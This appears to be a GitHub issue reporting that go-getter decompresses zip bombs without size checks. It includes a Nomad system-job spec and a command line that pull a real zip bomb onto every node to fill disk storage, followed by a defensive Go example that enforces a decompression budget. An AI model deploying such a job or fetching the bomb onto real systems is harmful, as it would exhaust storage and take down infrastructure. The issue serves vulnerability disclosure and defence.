
Vulnerable to Zip bombs. #407

@jboero

Description

Zip bombs or compression bombs are trick archives that are custom structured to generate terabytes of garbage (or zeros) from a small archive. It turns out go-getter's decompression options and detectors are susceptible to this. This is behaviour by design, but it might be a good idea if go-getter verified that an archive's size will fit in storage before decompression. This doesn't just apply to zip files but also xz, zstd, etc. Downloading a zip bomb today is actually detected and blocked by Chrome and some other browsers to prevent you from accidentally filling your partition.

A crafty Nomad job of type "system" could instantly bring down an entire Nomad DC if the artifact is downloaded to all nodes and expanded to fill all storage. This pseudo-job is missing the exec driver.

job "bomb" {
  type = "system"
  datacenters = ["dc1"]
  group "artifacts" {
    task "server" {
      artifact {
        source      = "https://www.bamsoftware.com/hacks/zipbomb/zblg.zip"
        destination = "/tmp/some-directory"
        options {
          checksum = "md5:207b597f03033b2e0644bbbc29f04053"
        }
      }
    }
  }
}

Beware zip bombs and please use caution if trying to reproduce this:
https://www.bamsoftware.com/hacks/zipbomb/

$ ~/go/bin/go-getter https://www.bamsoftware.com/hacks/zipbomb/zblg.zip /tmp/
2023/01/19 13:11:00 Error downloading: write /tmp/1: no space left on device
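One way to implement the check the issue asks for, as an added example in Go. This is not go-getter's or Nomad's own code; the function names (DeclaredZipSize, ExtractZipWithBudget, GunzipWithBudget) and the zero-filled test archives are assumptions made for illustration, standing in for zblg.zip so the program runs offline. It shows the two layers a practitioner wants: a cheap pre-check of the sizes the central directory declares, and a hard byte budget enforced during inflation that does not trust any header and therefore also covers gzip/xz/zstd streams, which declare no size up front.

```go
package main

import (
	"archive/zip"
	"bytes"
	"compress/gzip"
	"errors"
	"fmt"
	"io"
)

// ErrTooLarge signals that decompression would exceed the caller's byte budget.
var ErrTooLarge = errors.New("decompressed data exceeds the allowed size budget")

// DeclaredZipSize sums the uncompressed sizes the central directory claims for
// every entry. Reads only metadata, so it is cheap; the metadata is attacker
// controlled, so it is advisory and must be backed by a budget during extraction.
func DeclaredZipSize(archive []byte) (uint64, error) {
	zr, err := zip.NewReader(bytes.NewReader(archive), int64(len(archive)))
	if err != nil {
		return 0, err
	}
	var total uint64
	for _, f := range zr.File {
		total += f.UncompressedSize64
	}
	return total, nil
}

// copyWithBudget copies src into dst but never emits more than *remaining bytes.
// It reads one byte past the budget to detect overflow without trusting any
// size header, and deducts what it wrote on success.
func copyWithBudget(dst io.Writer, src io.Reader, remaining *int64) (int64, error) {
	n, err := io.Copy(dst, io.LimitReader(src, *remaining+1))
	if err != nil {
		return n, err
	}
	if n > *remaining {
		return n, ErrTooLarge
	}
	*remaining -= n
	return n, nil
}

// ExtractZipWithBudget rejects archives whose declared size exceeds maxBytes,
// then inflates each entry (into memory here; a downloader would stream to disk)
// under one budget shared across all entries.
func ExtractZipWithBudget(archive []byte, maxBytes int64) (map[string][]byte, error) {
	declared, err := DeclaredZipSize(archive)
	if err != nil {
		return nil, err
	}
	if declared > uint64(maxBytes) {
		return nil, fmt.Errorf("%w: central directory declares %d bytes, budget is %d", ErrTooLarge, declared, maxBytes)
	}
	zr, _ := zip.NewReader(bytes.NewReader(archive), int64(len(archive))) // parsed once already above
	remaining := maxBytes
	out := make(map[string][]byte)
	for _, f := range zr.File {
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		var buf bytes.Buffer
		_, err = copyWithBudget(&buf, rc, &remaining)
		rc.Close()
		if err != nil {
			return nil, fmt.Errorf("entry %q: %w", f.Name, err)
		}
		out[f.Name] = buf.Bytes()
	}
	return out, nil
}

// GunzipWithBudget applies the same guard to a format with no size table at all:
// gzip, xz and zstd streams only reveal their true size by being decompressed.
func GunzipWithBudget(stream []byte, maxBytes int64) ([]byte, error) {
	gr, err := gzip.NewReader(bytes.NewReader(stream))
	if err != nil {
		return nil, err
	}
	defer gr.Close()
	var buf bytes.Buffer
	remaining := maxBytes
	if _, err := copyWithBudget(&buf, gr, &remaining); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// BuildZeroZip / BuildZeroGzip are constructed test inputs (not the real zblg.zip):
// `size` zero bytes, which Deflate shrinks by roughly a thousandfold.
func BuildZeroZip(size int) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create("zeros.bin") // Create always uses the Deflate method
	w.Write(make([]byte, size))
	zw.Close()
	return buf.Bytes()
}

func BuildZeroGzip(size int) []byte {
	var buf bytes.Buffer
	gw := gzip.NewWriter(&buf)
	gw.Write(make([]byte, size))
	gw.Close()
	return buf.Bytes()
}

func main() {
	bomb := BuildZeroZip(4 << 20)
	declared, _ := DeclaredZipSize(bomb)
	fmt.Printf("%d bytes on the wire, %d bytes declared\n", len(bomb), declared)
	_, err := ExtractZipWithBudget(bomb, 1<<20)
	fmt.Println("zip with 1 MiB budget:", err)
	_, err = GunzipWithBudget(BuildZeroGzip(4<<20), 1<<20)
	fmt.Println("gzip with 1 MiB budget:", err)
}
```

The budget should be derived from what the destination can actually hold (free space on the target filesystem minus headroom), not from the archive's own claims; the pre-check only saves the work of inflating an archive that is honest about being too big.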
